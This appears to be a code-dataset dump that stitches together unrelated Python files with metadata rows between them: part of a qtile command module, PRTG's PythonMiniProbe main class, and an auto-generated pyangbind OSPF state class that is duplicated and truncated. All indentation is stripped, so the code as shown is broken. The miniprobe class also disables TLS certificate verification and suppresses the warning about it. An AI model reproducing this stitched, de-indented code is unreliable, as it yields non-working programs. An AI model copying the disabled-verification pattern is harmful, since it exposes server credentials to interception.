def __init__(self, qtile):
self.qtile = qtile
super(CommandRoot, self).__init__()
def call(self, selectors, name, *args, **kwargs):
state, val = self.qtile.server.call((selectors, name, args, kwargs))
if state == SUCCESS:
return val
elif state == ERROR:
raise CommandError(val)
else:
raise CommandException(val)
class _Call:
def __init__(self, selectors, name, *args, **kwargs):
"""
:command A string command name specification
:*args Arguments to be passed to the specified command
:*kwargs Arguments to be passed to the specified command
"""
self.selectors, self.name = selectors, name
self.args, self.kwargs = args, kwargs
# Conditionals
self.layout = None
def when(self, layout=None):
self.layout = layout
return self
def check(self, q):
if self.layout and q.currentLayout.name != self.layout:
return False
return True
class _LazyTree(_CommandRoot):
def call(self, selectors, name, *args, **kwargs):
return _Call(selectors, name, *args, **kwargs)
lazy = _LazyTree()
class CommandObject(object):
"""
Base class for objects that expose commands. Each command should be a
method named cmd_X, where X is the command name.
"""
def select(self, selectors):
if not selectors:
return self
name, sel = selectors[0]
selectors = selectors[1:]
r = self.items(name)
if (r is None) or\
(r[1] is None and sel is not None) or\
(r[1] is not None and sel and sel not in r[1]) or\
(r[0] is False and sel is None):
raise _SelectError(name, sel)
obj = self._select(name, sel)
if obj is None:
raise _SelectError(name, sel)
return obj.select(selectors)
def items(self, name):
"""
Returns a list of contained items for this name.
"""
ret = self._items(name)
if ret is None:
raise CommandError("Unknown item class: %s" % name)
return ret
def _items(self, name):
"""
Return (root, items) tuple for the specified item class, with:
root: True if this class accepts a "naked" specification
without an item specification (i.e. "layout"), and False if it
does not.
items is a list of contained items, or None if this object is
not a valid container.
Return None if name is not a valid item class.
"""
raise NotImplementedError
def _select(self, name, sel, selectors):
"""
Return a selected object, or None if no such object exists.
This method is called with the following guarantees:
- name is a valid selector class for this item
- sel is a valid selector for this item
- the name, sel tuple is not an "impossible" combination (e.g.
a selector is specified when this is not a containment
object).
"""
raise NotImplementedError
def command(self, name):
return getattr(self, "cmd_" + name, None)
def commands(self):
lst = []
for i in dir(self):
if i.startswith("cmd_"):
lst.append(i[4:])
return lst
def cmd_commands(self):
"""
Returns a list of possible commands for this object.
Used by __qsh__ for command completion and online help.
"""
return self.commands()
def cmd_items(self, name):
"""
Returns a list of contained items for the specified name. Used by
__qsh__ to allow navigation of the object graph.
"""
return self.items(name)
def docSig(self, name):
args, varargs, varkw, defaults = inspect.getargspec(self.command(name))
if args and args[0] == "self":
args = args[1:]
return name + inspect.formatargspec(args, varargs, varkw, defaults)
def docText(self, name):
return textwrap.dedent(self.command(name).__doc__ or "")
def doc(self, name):
spec = self.docSig(name)
htext = self.docText(name)
htext = "\n".join([i for i in htext.splitlines()])
return spec + htext
def cmd_doc(self, name):
"""
Returns the documentation for a specified command name. Used by
__qsh__ to provide online help.
"""
if name in self.commands():
return self.doc(name)
else:
raise CommandError("No such command: %s" % name)
| gpl-3.0 | -735,328,225,687,440,100 | 29.11194 | 79 | 0.581 | false |
PaesslerAG/PythonMiniProbe | miniprobe/miniprobe.py | 1 | 7571 | #!/usr/bin/env python
# Copyright (c) 2014, Paessler AG <[email protected]>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions
# and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions
# and the following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse
# or promote products derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# PRTG Python Miniprobe
# Miniprobe needs at least Python 2.7 because of "importlib"
# If older python version is used you will have to install "importlib"
# import general modules
import sys
import hashlib
import importlib
import gc
import logging
import subprocess
import os
import requests
import warnings
from requests.packages.urllib3 import exceptions
# import own modules
sys.path.append('./')
try:
import sensors
except Exception as e:
print(e)
class MiniProbe(object):
"""
Main class for the Python Mini Probe
"""
def __init__(self, http):
gc.enable()
self.http = http
logging.basicConfig(
filename="./logs/probe.log",
filemode="a",
level=logging.INFO,
format="%(asctime)s - %(levelname)s - %(message)s",
datefmt='%m/%d/%Y %H:%M:%S'
)
def get_import_sensors(self):
"""
import available sensor modules and return list of sensor objects
"""
sensor_objects = []
for mod in sensors.__all__:
try:
sensor_objects.append(self.load_class("sensors.%s.%s" % (mod.lower(), mod)))
except Exception as import_error:
logging.error("Sensor Import Error! Error message: %s" % import_error)
return sensor_objects
@staticmethod
def load_class(full_class_string):
"""
dynamically load a class from a string
"""
class_data = full_class_string.split(".")
module_path = ".".join(class_data[:-1])
class_str = class_data[-1]
module = importlib.import_module(module_path)
return getattr(module, class_str)
def read_config(self, path):
"""
read configuration file and write data to dict
"""
config = {}
try:
conf_file = open(path)
for line in conf_file:
if not (line == '\n'):
if not (line.startswith('#')):
config[line.split(':')[0]] = line.split(':')[1].rstrip()
conf_file.close()
return config
except Exception as read_error:
logging.error("No config found! Error Message: %s Exiting!" % read_error)
sys.exit()
@staticmethod
def hash_access_key(key):
"""
create hash of probes access key
"""
key = key.encode('utf-8')
return hashlib.sha1(key).hexdigest()
def create_parameters(self, config, jsondata, i=None):
"""
create URL parameters for announce, task and data requests
"""
if i == 'announce':
return {'gid': config['gid'], 'key': self.hash_access_key(config['key']), 'protocol': config['protocol'],
'name': config['name'], 'baseinterval': config['baseinterval'], 'sensors': jsondata}
else:
return {'gid': config['gid'], 'key': self.hash_access_key(config['key']), 'protocol': config['protocol']}
def create_url(self, config, i=None, http=False):
"""
creating the actual URL
"""
prefix = "https"
if http:
prefix = "http"
if not (i is None) and (i != "data"):
return "%s://%s:%s/probe/%s" % (
prefix, config['server'], config['port'], i)
elif i == "data":
return "%s://%s:%s/probe/%s?gid=%s&protocol=%s&key=%s" % (prefix, config['server'], config['port'], i,
config['gid'], config['protocol'],
self.hash_access_key(config['key']))
pass
else:
return "No method given"
def build_announce(self, sensor_list):
"""
build json for announce request
"""
sensors_avail = []
for sensor in sensor_list:
if not sensor.get_sensordef() == "":
sensors_avail.append(sensor.get_sensordef())
return sensors_avail
def build_task(self, config):
"""
build data payload for task request.
"""
task = {
'gid': config['gid'],
'protocol': config['protocol'],
'key': self.hash_access_key(config['key'])
}
return task
def request_to_core(self, req_type, data, config):
"""
perform different request types to the core
"""
url = self.create_url(config, req_type, self.http)
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore", exceptions.InsecureRequestWarning)
request_to_core = requests.post(url, data=data, verify=False, timeout=30)
logging.info("%s request successfully sent to PRTG Core Server at %s:%s."
% (req_type, config["server"], config["port"]))
logging.debug("Connecting to %s:%s" % (config["server"], config["port"]))
logging.debug("Status Code: %s | Message: %s" % (request_to_core.status_code, request_to_core.text))
return request_to_core
except requests.exceptions.Timeout:
logging.error("%s Timeout: %s" % (req_type, str(data)))
raise
except Exception as req_except:
logging.error("Exception %s!" % req_except)
raise
def split_json_response(self, json_response, size=None):
"""
split up response from task request into predefined chunk sizes
"""
if not size:
size = "10"
return [json_response[i:i + int(size)] for i in range(0, len(json_response), int(size))]
@staticmethod
def clean_mem():
"""Ugly brute force method to clean up Mem"""
subprocess.call("sync", shell=False)
os.popen("sysctl vm.drop_caches=1")
os.popen("sysctl vm.drop_caches=2")
os.popen("sysctl vm.drop_caches=3")
| bsd-3-clause | -7,684,119,281,292,025,000 | 37.431472 | 119 | 0.59226 | false |
napalm-automation/napalm-yang | napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/__init__.py | 1 | 49119 | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters for the AS external LSA
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__mask",
"__metric_type",
"__metric",
"__forwarding_address",
"__external_route_tag",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__mask = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
self.__forwarding_address = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
self.__external_route_tag = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"as-external-lsa",
"state",
]
def _get_mask(self):
"""
Getter method for mask, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/mask (uint8)
YANG Description: The subnet mask for the advertised destination
"""
return self.__mask
def _set_mask(self, v, load=False):
"""
Setter method for mask, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/mask (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_mask is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mask() directly.
YANG Description: The subnet mask for the advertised destination
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """mask must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..32']}), is_leaf=True, yang_name="mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__mask = t
if hasattr(self, "_set"):
self._set()
def _unset_mask(self):
self.__mask = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
def _get_metric_type(self):
"""
Getter method for metric_type, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric_type (enumeration)
YANG Description: The type of metric included within the AS External LSA.
"""
return self.__metric_type
def _set_metric_type(self, v, load=False):
"""
Setter method for metric_type, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric_type (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric_type() directly.
YANG Description: The type of metric included within the AS External LSA.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric_type must be of a type compatible with enumeration""",
"defined-type": "openconfig-network-instance:enumeration",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'TYPE_1': {}, 'TYPE_2': {}},), is_leaf=True, yang_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='enumeration', is_config=False)""",
}
)
self.__metric_type = t
if hasattr(self, "_set"):
self._set()
def _unset_metric_type(self):
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric (oc-ospf-types:ospf-metric)
YANG Description: The cost to reach the external network specified. The exact
interpretation of this cost is dependent on the type of
metric specified
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric (oc-ospf-types:ospf-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The cost to reach the external network specified. The exact
interpretation of this cost is dependent on the type of
metric specified
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""",
"defined-type": "oc-ospf-types:ospf-metric",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
def _get_forwarding_address(self):
"""
Getter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/forwarding_address (inet:ipv4-address-no-zone)
YANG Description: The destination to which traffic for the external prefix
should be advertised. When this value is set to 0.0.0.0 then
traffic should be forwarded to the LSA's originator
"""
return self.__forwarding_address
def _set_forwarding_address(self, v, load=False):
"""
Setter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/forwarding_address (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_forwarding_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_forwarding_address() directly.
YANG Description: The destination to which traffic for the external prefix
should be advertised. When this value is set to 0.0.0.0 then
traffic should be forwarded to the LSA's originator
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """forwarding_address must be of a type compatible with inet:ipv4-address-no-zone""",
"defined-type": "inet:ipv4-address-no-zone",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
}
)
self.__forwarding_address = t
if hasattr(self, "_set"):
self._set()
def _unset_forwarding_address(self):
self.__forwarding_address = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
def _get_external_route_tag(self):
"""
Getter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/external_route_tag (uint32)
YANG Description: An opaque tag that set by the LSA originator to carry
information relating to the external route
"""
return self.__external_route_tag
def _set_external_route_tag(self, v, load=False):
"""
Setter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/external_route_tag (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_external_route_tag is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_external_route_tag() directly.
YANG Description: An opaque tag that set by the LSA originator to carry
information relating to the external route
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """external_route_tag must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__external_route_tag = t
if hasattr(self, "_set"):
self._set()
def _unset_external_route_tag(self):
self.__external_route_tag = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
mask = __builtin__.property(_get_mask)
metric_type = __builtin__.property(_get_metric_type)
metric = __builtin__.property(_get_metric)
forwarding_address = __builtin__.property(_get_forwarding_address)
external_route_tag = __builtin__.property(_get_external_route_tag)
_pyangbind_elements = OrderedDict(
[
("mask", mask),
("metric_type", metric_type),
("metric", metric),
("forwarding_address", forwarding_address),
("external_route_tag", external_route_tag),
]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters for the AS external LSA
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__mask",
"__metric_type",
"__metric",
"__forwarding_address",
"__external_route_tag",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__mask = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
self.__forwarding_address = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
self.__external_route_tag = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"as-external-lsa",
"state",
]
def _get_mask(self):
"""
Getter method for mask, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/mask (uint8)
YANG Description: The subnet mask for the advertised destination
"""
return self.__mask
def _set_mask(self, v, load=False):
"""
Setter method for mask, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/mask (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_mask is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mask() directly.
YANG Description: The subnet mask for the advertised destination
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
